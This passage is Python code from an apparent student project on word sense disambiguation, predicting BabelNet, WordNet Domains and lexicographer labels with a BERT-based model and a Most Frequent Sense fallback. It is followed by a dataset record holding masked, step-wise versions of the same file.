I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead 3 --> Means I'm predicting with Lexicon. Need to consult the vocab. :return: the chosen sense with the MFS technique """ pos = parola.get('pos') pos_input = __decide_pos(pos) wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input) try: wordnet_object = wordnet_object[0] except: print(wordnet_object) print(parola.text) wn_synset = "wn:" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos() the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value) to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case) return to_return def __extrapolate_value_for_MFS(value: object, pred_case: int = 1, vocab: Dict = None) -> str: """ Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction :param value: The Value from which to extrapolate the actual meaning found :param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values: 1 --> Means I'm predicting with Babelnet. No extra precautions needed 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead 3 --> Means I'm predicting with Lexicon. Need to consult the vocab. :param vocab: The vocab in support of mode 2 or 3. 
:return: the actual meaning found with MFS """ the_meaning_to_explot = __type_checker(value) if pred_case == 1: return the_meaning_to_explot if pred_case == 2: to_return = vocab.get(the_meaning_to_explot) return to_return[0] if to_return else "factotum" if pred_case == 3: to_return = vocab.get(the_meaning_to_explot) return to_return[0] def __type_checker(value: object) -> str: """ Checks the type of the object and, accordingly, returns it :param value: the value to examinate :return: a string that is the value expected """ if type(value) == str: return value if type(value) == list: return value[0] def __decide_pos(pos: str) -> str: """ Decides the WN representation of the given pos in input :param pos: the pos to interpret with WordNet :return: the WN representation of the given pos """ to_return = None if pos == 'NOUN': to_return = "n" if pos == 'VERB': to_return = 'v' if pos == 'ADJ': to_return = 'a' if pos == 'ADV': to_return = 'r' return to_return def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) -> List: """ Cast the given list (which contains only WN ids) to Babelnet IDs :param list_of_bn: the list to cast :param vocab: the vocabulary to use to perform the conversion :return: the converted list """ list_of_possible_senses_bn_version = [] for candidate in list_of_bn: is_it_here = next(key for key, value in vocab.items() if candidate in value) if is_it_here: list_of_possible_senses_bn_version.append(is_it_here if type(is_it_here) == str else is_it_here[0]) return list_of_possible_senses_bn_version def create_custom_label(list_of_possible_senses: List, word: str, vocab: Dict, predictions, enable_coarse_grained: int = 1) -> List: """ Converts the list of babelnet IDS to a number and outputs the converted list :param list_of_possible_senses: the list that contains all the babelnet's IDs :param word: the word for which we are predicting the sense in a specific moment :param vocab: the vocabulary Word -> Serial to exploit for the conversion :param predictions: the predictions made by the system :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values: 1 --> The flow will still be the same 2,3 -> Flow will change, triggering the first step for the coarse-grained approach. 
:return: a List with the IDs converted """ to_return = [] list_of_indices_to_delete = [] for indice in range(len(list_of_possible_senses)): new_string = word + "_" + list_of_possible_senses[indice] if enable_coarse_grained == 1 else list_of_possible_senses[indice] conversion = None try: conversion = int(vocab[new_string]) to_return.append(predictions[conversion]) except: list_of_indices_to_delete.append(indice) continue if list_of_indices_to_delete: list_of_possible_senses = [list_of_possible_senses[prov_index] for prov_index in range(len(list_of_possible_senses)) if prov_index not in list_of_indices_to_delete] return to_return, list_of_possible_senses if __name__ == "__main__": predict_babelnet("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources") #predict_wordnet_domains("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources") #predict_lexicographer("/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml", "../output", "/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources")
normal
{ "blob_id": "e3631a2a003f98fbf05c45a019250e76d3366949", "index": 2582, "step-1": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\n<mask token>\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. 
If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: 
the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. 
Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. 
Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where 